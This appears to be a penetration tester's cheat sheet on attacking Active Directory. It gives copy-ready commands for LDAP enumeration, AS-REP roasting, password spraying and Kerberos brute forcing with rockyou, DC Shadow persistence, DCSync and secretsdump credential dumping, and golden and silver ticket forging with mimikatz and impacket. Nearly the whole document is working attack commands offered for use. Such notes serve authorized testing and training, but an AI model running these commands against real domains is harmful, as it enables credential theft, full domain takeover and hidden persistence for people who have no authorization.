# AD Related ![](https://pbs.twimg.com/media/CNiCKDaUwAAPXqD?format=jpg\&name=900x900) ## Enumeration Basic ldap enumeration * * * ```py python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123-u morph3 python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2 python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd ``` ## LDAP Queries Get all the users ``` Get-ADUser -LDAPFilter "(objectClass=user)" ``` Dump ldap fully ``` export LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar ``` ## AS-Rep Roasting If a user has pre auth enabled, you grab his/her hash ``` impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7 ``` ## Bruteforcing - Password Spraying * ```py Import-Module .\DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt ``` ## Kerbrute Kerberos(port 88) bruteforcing * * ``` # Password brute ./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3 # Username brute ./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt # Password spray ./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt ``` ## DC Shadow * -This is a persistence attack- DC Shadow attack aims to inject malicious Domain Controlllers into AD infrastructure so that we can dump actual AD members. Find sid for that user ``` wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid ``` This will create a RPC Server and listen ``` lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid ``` Run this from another mimikatz ``` lsadump::dcshadow /push ``` After this, unregistration must be done. Relogin now and perform DCSync ```py lsadump::dcsync /domain:ECORP.local /account:krbtgt ``` ## DC Sync Using mimikatz, ``` lsadump::dcsync /domain:domain /all /csv lsadump::dcsync /user:krbtgt ``` Using DCSync.ps1, * ``` https://gist.github.com/monoxgas/9d238accd969550136db powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat" ``` Using secretdumps module from impacket, ```py python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL impacket-secretsdump morph3@10.11.1.75 ``` ## Domain Trust ``` get-domaintrustmapping ``` We get current domain or target domain sid using `Get-DomainSID` ``` kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /sids: /ptt ``` ## Golden Ticket Use krbtgt's hash and you can forge tickets for anyone. Get krbtgt hash, ``` lsadump::dcsync /all /csv ``` You might want to patch it ``` lsadump::lsa /patch lsadump::trust /patch ``` Forging the ticket * /rc4 or /krbtgt -> krbtgt hash * /sid -> Get-DomainSID * /ticket -> this parameter is optional but default is ticket.kirbi * /groups -> this parameter is optional but default is 513,512,520,518,519 * /ptt -> switch to perform ptt ``` kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 kerberos::ptt ticket.kirbi ``` After this, your final ticket should be ready. You can also verify by using the following command that it is in your cache. ``` klist ``` You can now verify it is working. ``` dir \\DC\C$ psexec.exe \\DC cmd.exe ``` purge it ``` kerberos::purge ``` If you want to use metasploit ``` post/windows/escalate/golden_ticket ``` ## Silver Ticket Service accounts ticketer, ``` python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05 ```